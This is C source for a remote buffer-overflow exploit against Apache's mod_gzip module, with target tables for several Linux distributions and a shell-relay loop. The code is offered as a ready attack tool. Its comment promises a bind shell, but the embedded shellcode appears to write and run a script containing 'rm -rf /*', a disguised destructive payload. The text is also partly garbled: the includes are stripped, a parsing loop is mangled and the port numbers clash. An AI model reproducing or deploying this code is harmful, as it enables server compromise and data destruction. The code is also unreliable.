We just add some new rets. w00t!! /* m00-mod_gzip.c * * mod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru * * Binds shell on port 63021. * Based on 85mod_gzip.c by xCrZx // crazy_einstein@yahoo.com * * Available targets: * Suse 8.1 * RedHat 7.3 * RedHat 8.0 * RedHat 9.0 * Mandrake 9.1 * * * Testing: * sh-2.05b$ ./m00-mod_gzip localhost 80 * * mod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru * * [~] Connecting to localhost:80 * [~] Connected! * [~] Trying to connect to localhost:63021 port!!! * [~] Sleeping... * * [+] Shell spawned! w00t!!! * * uid=99(nobody) gid=99(nobody) groups=99(nobody) * Linux localhost 2.4.21-0.13mdk #1 Fri Nov 22 15:08:06 EST 2003 i686 unknown unknown GNU/Linux * 20:29:44 up 2:29, 3 users, load average: 0.04, 0.09, 0.11 * * * Greets to: * - nerF security team // www.nerf.ru * - LimpidByte // lbyte.sysdrop.org * - priv8security (especially to wsxz =)) // www.priv8security.com * - UHAGr // www.uhagr.com * - ech0 // x25.cc * - ppl from EFnet@m00sec and #nerf * - all our friends from #xakep@DALnet * * Authors: * - Over_G // overg[at]mail.ru * - d4rkgr3y // d4rk[at]securitylab.ru * * Released 22/11/03 // www.m00.ru */ #include #include #include #include #include #include #include #include #include #define STEP 1000 char fmt[] = "POST /?%s HTTP/1.1\r\n" "Content-Type: text/html\r\n" "Host: %s\r\n" "Content-Length: %d\r\n" "Accept-Encoding: gzip, deflate\r\n\r\n" "%s\r\n\r\n"; //shellcode for Linux x86 -> bind shell on 63021 port// char default_shellcode[] = "\x31\xC0\x50\x68\x2F\x62\x69\x6E\x89\xE3\xB0\x0C\xCD\x80\x31\xC0\x50" "\x68\x7A\x7A\x7A\x7A\x89\xE3\x6A\x41\x59\xB0\x05\xCD\x80\x31\xC9\x51" "\x68\x2F\x2A\x20\x26\x68\x2D\x72\x66\x20\x68\x0A\x72\x6D\x20\x68\x6B" "\x69\x6C\x6C\x68\x20\x2D\x66\x20\x68\x68\x0A\x72\x6D\x68\x69\x6E\x2F" "\x73\x68\x23\x21\x2F\x62\x89\xE1\x89\xC3\xB2\x20\xB0\x04\xCD\x80\xB0" "\x06\xCD\x80\x31\xC0\x50\x68\x7A\x7A\x7A\x7A\x89\xE3\x66\xB9\xED\x01" 
"\xB0\x0F\xCD\x80\x31\xC0\x31\xD2\x50\x68\x7A\x7A\x7A\x7A\x68\x2E\x2F" "\x2F\x2F\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80\x31\xC0\x40\xCD\x80"; struct TARGETS { char *distr; long ret; long std_err; char *shellcode; char *jmp; } targets[] = { /* you can add targets here */ {"RedHat 9.0", // flavour info 0xbfffc8a2, // ret_addr in stack 0x31823610, // address of stderr default_shellcode, "\xbb\xaa\x1b\xa5\xa1\x81\xc3\x71\x71\x71\x71\xff\xe3" }, {"RedHat 8.0", // flavour info 0xbfffd8f0, // ret_addr in stack 0x42127480, // address of stderr default_shellcode, "\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3" }, {"RedHat 7.3", // flavour info 0xbffcf610, // ret_addr in stack 0x42131806, // address of stderr default_shellcode, "\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3" }, {"SuSe 8.1", // flavour info 0xbfc917c0, // ret_add in stack 0x58184617, // address of stderr default_shellcode, "\xbb\xaa\x1b\xa5\xa1\x81\xc3\x63\x63\x63\x63\xff\xe3" }, {"Mandrake 9.1", // flavour info 0xbc04172f, // ret_add in stack 0x41196735, // address of stderr default_shellcode, "\xbb\xaa\x1b\xa5\xa1\x81\xc3\x49\x49\x49\x49\xff\xe3" } }; long getip(char *hostname) { struct hostent *he; long ipaddr; if ((ipaddr = inet_addr(hostname)) < 0) { if ((he = gethostbyname(hostname)) == NULL) { perror("gethostbyname()"); exit(-1); } memcpy(&ipaddr, he->h_addr, he->h_length); } return ipaddr; } void usage(char *prog) { int i=0; printf("\nUsage: %s <-h www.victim.com> [-p port] [-t target] [-r manual_retaddr] [-b addr] [-s step_num]\n\nTargets:\n",prog); while(targets[i++].distr) printf("\t[%d] -> %s\n",i-1,targets[i-1].distr); printf("\n"); exit(0); } int main(int argc, char **argv) { int i=0; struct sockaddr_in sockstruct; struct hostent *HOST; char tmp[20000]; char buf1[5000],buf2[10000]; int sock; fd_set rset; void (*range)(); int port=80,shellport=2003; int step=STEP; char *victim=NULL; long ret=0xbfffffff,ret_err; int brutemode=0; char *shellcode,*jmp; int trg=0; printf("\nmod_gzip <= 
1.2.26.1a remote exploit by m00 security // www.m00.ru\n\n"); for(i=0;i-1) { if(!brutemode)printf("[~] Connected!\n",i); memset(tmp ,0x00,sizeof tmp ); memset(buf1,0x00,sizeof buf1); memset(buf2,0x00,sizeof buf2); memset(buf1,0x90,2016); memcpy(buf1+strlen(buf1),jmp,strlen(jmp)); memset(buf1+strlen(buf1),0x90,2280); *(long *)&buf1[strlen(buf1)]=ret_err; for(i=0;i<100;i++) *(long *)&buf1[strlen(buf1)]=ret; memset(buf2,0x90,1000); memcpy(buf2+strlen(buf2),shellcode,strlen(shellcode)); sprintf(tmp,fmt,buf1,victim,strlen(buf2),buf2); write(sock,tmp,strlen(tmp)); }else { printf("[x] Error: Could not connect to %s:%d!\n",victim,port);exit(0);} close(sock); ret-= step; if(brutemode) {printf(".");fflush(stdout);} if(!brutemode) { printf("[~] Trying to connect to %s:%d port!!!\n",victim,shellport); printf("[~] Sleeping...\n"); } sleep(2); sock=socket(PF_INET,SOCK_STREAM,0); bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_zero)); sockstruct.sin_family=PF_INET; sockstruct.sin_addr.s_addr=getip(victim); sockstruct.sin_port=htons(shellport); if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) { printf("\n[+] Shell spawned! w00t!!!\n\n"); write(sock, "id;uname -a\n", 12); while (1) { FD_ZERO(&rset); FD_SET(sock,&rset); FD_SET(STDIN_FILENO,&rset); select(sock + 1, &rset, NULL, NULL, NULL); if (FD_ISSET(sock, &rset)) { i = read(sock, tmp, sizeof(tmp) - 1); if (i <= 0) { printf("[!] Connection closed.\n"); close(sock); exit(0); } tmp[i] = 0; printf("%s", tmp); } if (FD_ISSET(STDIN_FILENO, &rset)) { i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1); if (i > 0) { tmp[i]=0; write(sock, tmp, i); } } } } else if(!brutemode)printf("[x] Shell is inaccessible..\n\n"); close(sock); } while ( brutemode ); return 0; } // m00000000000oooooooooooooooo